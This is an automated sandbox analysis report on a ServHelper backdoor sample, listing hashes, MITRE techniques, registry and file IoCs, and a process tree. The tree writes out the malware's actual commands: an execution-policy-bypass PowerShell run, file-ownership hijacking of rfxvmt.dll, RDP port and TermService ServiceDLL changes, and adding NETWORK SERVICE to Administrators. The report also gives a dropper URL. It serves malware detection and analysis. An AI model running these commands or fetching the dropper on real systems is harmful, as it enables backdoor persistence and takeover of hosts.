servhelper | 3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b

Analysis

max time kernel
144s
max time network
163s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 10:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe
Size

7.6MB
MD5

88e8fd31d8e8a76cd57c9051ed96ee66
SHA1

86712df63cf56ae014d91f1f276ea4491c115a8e
SHA256

3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b
SHA512

af5c924b3c3181b4720ec9d1d0e757ceb9a4d0371cfb9c0a22da08fd77d2324dc0e716cc0fa5ea3d7981256ce772c4327d04a9e2954de654cd07851514a610f9
SSDEEP

98304:OsgijX8uqOeLajSKF6ZKHiT431RArwISOskLPJaGiZak2mzhLS:RjsuxeLQr6KiT4PArwPOsGJaG6ak1ZS

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
34	3500	powershell.exe
36	3500	powershell.exe
38	3500	powershell.exe
43	3500	powershell.exe
45	3500	powershell.exe
47	3500	powershell.exe
49	3500	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1336 icacls.exe
1400 takeown.exe
5000 icacls.exe
2616 icacls.exe
4448 icacls.exe
5020 icacls.exe
2192 icacls.exe
3868 icacls.exe

pid	process
1336	icacls.exe
1400	takeown.exe
5000	icacls.exe
2616	icacls.exe
4448	icacls.exe
5020	icacls.exe
2192	icacls.exe
3868	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

2484
2484
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

3868 icacls.exe
1336 icacls.exe
1400 takeown.exe
5000 icacls.exe
2616 icacls.exe
4448 icacls.exe
5020 icacls.exe
2192 icacls.exe

pid	process
2484
2484

pid	process
3868	icacls.exe
1336	icacls.exe
1400	takeown.exe
5000	icacls.exe
2616	icacls.exe
4448	icacls.exe
5020	icacls.exe
2192	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

33 raw.githubusercontent.com
34 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
33	raw.githubusercontent.com
34	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_frqqytle.alp.psm1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_sb0aph00.anf.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI42FF.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI4370.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI43BF.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI432F.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI435F.tmp	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4252 WMIC.exe

pid	process
4252	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 1da5a46f0069da01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4620 reg.exe
Runs net.exe

pid	process
4620	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	36	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	38	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4640	powershell.exe
4640	powershell.exe
1004	powershell.exe
1004	powershell.exe
3312	powershell.exe
3312	powershell.exe
2908	powershell.exe
2908	powershell.exe
4640	powershell.exe
4640	powershell.exe
4640	powershell.exe
3500	powershell.exe
3500	powershell.exe
3500	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

664
664

pid	process
664
664

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeRestorePrivilege	2616	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4252	WMIC.exe
Token: SeAuditPrivilege	4252	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4252	WMIC.exe
Token: SeAuditPrivilege	4252	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4116	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4116	WMIC.exe
Token: SeAuditPrivilege	4116	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4116	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4116	WMIC.exe
Token: SeAuditPrivilege	4116	WMIC.exe
Token: SeDebugPrivilege	3500	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 2376 wrote to memory of 4640	2376	3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe	powershell.exe
PID 2376 wrote to memory of 4640	2376	3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe	powershell.exe
PID 4640 wrote to memory of 3224	4640	powershell.exe	csc.exe
PID 4640 wrote to memory of 3224	4640	powershell.exe	csc.exe
PID 3224 wrote to memory of 4804	3224	csc.exe	cvtres.exe
PID 3224 wrote to memory of 4804	3224	csc.exe	cvtres.exe
PID 4640 wrote to memory of 1004	4640	powershell.exe	powershell.exe
PID 4640 wrote to memory of 1004	4640	powershell.exe	powershell.exe
PID 4640 wrote to memory of 3312	4640	powershell.exe	powershell.exe
PID 4640 wrote to memory of 3312	4640	powershell.exe	powershell.exe
PID 4640 wrote to memory of 2908	4640	powershell.exe	powershell.exe
PID 4640 wrote to memory of 2908	4640	powershell.exe	powershell.exe
PID 4640 wrote to memory of 1400	4640	powershell.exe	takeown.exe
PID 4640 wrote to memory of 1400	4640	powershell.exe	takeown.exe
PID 4640 wrote to memory of 5000	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 5000	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 2616	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 2616	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 4448	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 4448	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 5020	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 5020	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 2192	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 2192	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 3868	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 3868	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 1336	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 1336	4640	powershell.exe	icacls.exe
PID 4640 wrote to memory of 3760	4640	powershell.exe	reg.exe
PID 4640 wrote to memory of 3760	4640	powershell.exe	reg.exe
PID 4640 wrote to memory of 4620	4640	powershell.exe	reg.exe
PID 4640 wrote to memory of 4620	4640	powershell.exe	reg.exe
PID 4640 wrote to memory of 1464	4640	powershell.exe	reg.exe
PID 4640 wrote to memory of 1464	4640	powershell.exe	reg.exe
PID 4640 wrote to memory of 1888	4640	powershell.exe	net.exe
PID 4640 wrote to memory of 1888	4640	powershell.exe	net.exe
PID 1888 wrote to memory of 2412	1888	net.exe	net1.exe
PID 1888 wrote to memory of 2412	1888	net.exe	net1.exe
PID 4640 wrote to memory of 376	4640	powershell.exe	cmd.exe
PID 4640 wrote to memory of 376	4640	powershell.exe	cmd.exe
PID 376 wrote to memory of 4864	376	cmd.exe	cmd.exe
PID 376 wrote to memory of 4864	376	cmd.exe	cmd.exe
PID 4864 wrote to memory of 3168	4864	cmd.exe	net.exe
PID 4864 wrote to memory of 3168	4864	cmd.exe	net.exe
PID 3168 wrote to memory of 3416	3168	net.exe	net1.exe
PID 3168 wrote to memory of 3416	3168	net.exe	net1.exe
PID 4640 wrote to memory of 3352	4640	powershell.exe	cmd.exe
PID 4640 wrote to memory of 3352	4640	powershell.exe	cmd.exe
PID 3352 wrote to memory of 4680	3352	cmd.exe	cmd.exe
PID 3352 wrote to memory of 4680	3352	cmd.exe	cmd.exe
PID 4680 wrote to memory of 3660	4680	cmd.exe	net.exe
PID 4680 wrote to memory of 3660	4680	cmd.exe	net.exe
PID 3660 wrote to memory of 2592	3660	net.exe	net1.exe
PID 3660 wrote to memory of 2592	3660	net.exe	net1.exe
PID 2720 wrote to memory of 1596	2720	cmd.exe	net.exe
PID 2720 wrote to memory of 1596	2720	cmd.exe	net.exe
PID 1596 wrote to memory of 4684	1596	net.exe	net1.exe
PID 1596 wrote to memory of 4684	1596	net.exe	net1.exe
PID 4328 wrote to memory of 836	4328	cmd.exe	net.exe
PID 4328 wrote to memory of 836	4328	cmd.exe	net.exe
PID 836 wrote to memory of 4444	836	net.exe	net1.exe
PID 836 wrote to memory of 4444	836	net.exe	net1.exe
PID 4776 wrote to memory of 2244	4776	cmd.exe	net.exe
PID 4776 wrote to memory of 2244	4776	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe
"C:\Users\Admin\AppData\Local\Temp\3db7b97aa0bff0fdde441f01d62d0504c33088314472a3cbbd6bc684dd04697b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4640
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkogmnrw\lkogmnrw.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3224
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC18B.tmp" "c:\Users\Admin\AppData\Local\Temp\lkogmnrw\CSC12C5380FCF2943D69BB0C3F8A9C9346.TMP"
      4⤵
      PID:4804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2908
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1400
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5000
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2616
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4448
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5020
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2192
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3868
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1336
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3760
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:4620
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1464
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2412
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:376
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4864
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3168
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3416
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3352
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4680
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3660
      - C:\Windows\system32\net1.exe
        
